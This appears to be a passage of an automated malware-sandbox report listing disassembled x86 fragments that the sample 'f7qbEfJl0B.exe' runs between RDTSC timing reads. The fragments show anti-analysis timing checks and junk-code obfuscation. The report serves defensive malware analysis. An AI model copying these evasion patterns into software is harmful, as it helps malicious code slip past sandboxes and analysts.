Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183576B second address: 1835779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F7B212E85C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183EDF4 second address: 183EDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183EDF8 second address: 183EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F7B212E85C8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov dword ptr [ebp+129C1D16h], edx 0x00000019 jnp 00007F7B212E85CCh 0x0000001f push 00000000h 0x00000021 mov di, B10Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F7B212E85C8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 call 00007F7B212E85CFh 0x00000046 xor bh, 00000011h 0x00000049 pop ebx 0x0000004a xchg eax, esi 0x0000004b jmp 00007F7B212E85D9h 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F7B212E85D9h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1835779 second address: 1835801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F7B216C3178h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 jmp 00007F7B216C317Ch 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+129C2959h], eax 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F7B216C3178h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov bx, cx 0x00000059 mov eax, dword ptr [ebp+129C0B65h] 0x0000005f mov edi, 5478EF9Eh 0x00000064 push FFFFFFFFh 0x00000066 sub di, 45A2h 0x0000006b push eax 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F7B216C3176h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1837878 second address: 183787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183787C second address: 1837880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1842DE1 second address: 1842DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183B06A second address: 183B078 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183B078 second address: 183B09C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7B212E85D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183CE56 second address: 183CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183E02E second address: 183E032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1846636 second address: 184664B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3187h 0x00000008 jmp 00007F7B216C317Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184664B second address: 1846658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F7B212E85C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184A591 second address: 184A595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 184F90E second address: 184F916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185139E second address: 18513CA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C3178h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e ja 00007F7B216C3182h 0x00000014 jns 00007F7B216C317Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18513CA second address: 18513D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18513D4 second address: 18513D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515D4 second address: 18515DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7B212E85C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515DF second address: 18515E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515E5 second address: 18515E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18515E9 second address: 1851601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1851601 second address: 1851606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855FF1 second address: 1855FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855FF5 second address: 185601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F7B212E85C6h 0x00000010 jmp 00007F7B212E85D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185601D second address: 1856021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855296 second address: 185529C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18553E1 second address: 185543E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C317Eh 0x00000008 jbe 00007F7B216C3190h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F7B216C317Fh 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F7B216C3182h 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185543E second address: 1855444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556E1 second address: 18556E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556E5 second address: 18556EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556EE second address: 18556F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556F5 second address: 18556FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18556FF second address: 1855721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7B216C317Bh 0x0000000f jmp 00007F7B216C317Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855721 second address: 1855727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855727 second address: 1855731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855731 second address: 1855735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18558D3 second address: 18558F5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B216C3176h 0x00000008 jmp 00007F7B216C317Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18558F5 second address: 18558FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855A43 second address: 1855A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855BB1 second address: 1855BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F7B212E85D4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855D44 second address: 1855D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1855D52 second address: 1855D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185DEFE second address: 185DF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E211 second address: 185E217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E217 second address: 185E26E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3183h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 jmp 00007F7B216C317Fh 0x00000017 pop esi 0x00000018 jnp 00007F7B216C3193h 0x0000001e jmp 00007F7B216C3187h 0x00000023 jnc 00007F7B216C3176h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E3BE second address: 185E3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E66E second address: 185E689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C317Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E689 second address: 185E693 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B212E85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E693 second address: 185E698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E698 second address: 185E6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E980 second address: 185E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185E984 second address: 185E9A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7B212E85D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185EEF0 second address: 185EEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185EEF9 second address: 185EEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185EEFD second address: 185EF07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185EF07 second address: 185EF56 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7B212E85CEh 0x00000008 push ebx 0x00000009 jnl 00007F7B212E85C6h 0x0000000f jmp 00007F7B212E85D5h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F7B212E85D6h 0x0000001e jl 00007F7B212E85C6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185DC39 second address: 185DC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7B216C3176h 0x0000000a popad 0x0000000b pop ecx 0x0000000c jo 00007F7B216C31C0h 0x00000012 pushad 0x00000013 jmp 00007F7B216C3182h 0x00000018 jmp 00007F7B216C3183h 0x0000001d jmp 00007F7B216C317Fh 0x00000022 js 00007F7B216C3176h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 185DC8B second address: 185DC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865C42 second address: 1865C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865C46 second address: 1865C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865C50 second address: 1865C6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7B216C3185h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186498A second address: 1864991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1864991 second address: 186499B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C317Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1864C71 second address: 1864C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865073 second address: 18650AC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B216C317Ch 0x00000008 push esi 0x00000009 jmp 00007F7B216C3182h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 jmp 00007F7B216C317Bh 0x00000017 push esi 0x00000018 jns 00007F7B216C3176h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1864613 second address: 1864619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1864619 second address: 1864644 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3176h 0x00000008 jno 00007F7B216C3176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F7B216C3187h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1864644 second address: 1864650 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7B212E85C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865936 second address: 186593E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186593E second address: 1865948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1865948 second address: 186594C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186594C second address: 186598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7B212E85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F7B212E85CAh 0x00000015 pushad 0x00000016 jmp 00007F7B212E85CFh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7B212E85CAh 0x00000025 jbe 00007F7B212E85C6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17E8519 second address: 17E8524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17E8524 second address: 17E8530 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7B212E85C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1869CD3 second address: 1869CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186E124 second address: 186E12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186E12A second address: 186E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18243DC second address: 180AC47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F7B212E85C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+129C39ABh] 0x0000002c lea eax, dword ptr [ebp+12B761A5h] 0x00000032 mov dword ptr [ebp+129C2937h], ebx 0x00000038 nop 0x00000039 push edi 0x0000003a jmp 00007F7B212E85D6h 0x0000003f pop edi 0x00000040 push eax 0x00000041 jmp 00007F7B212E85CFh 0x00000046 nop 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007F7B212E85C8h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000014h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov edi, 2D322CFFh 0x00000066 jl 00007F7B212E85CAh 0x0000006c mov dx, F0F6h 0x00000070 call dword ptr [ebp+129C1AA6h] 0x00000076 push edi 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824AA8 second address: 1824AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7B216C3176h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824AB3 second address: 1824ABD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B212E85CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824ABD second address: 1824ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824ACC second address: 1824AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824AD0 second address: 1824ADA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
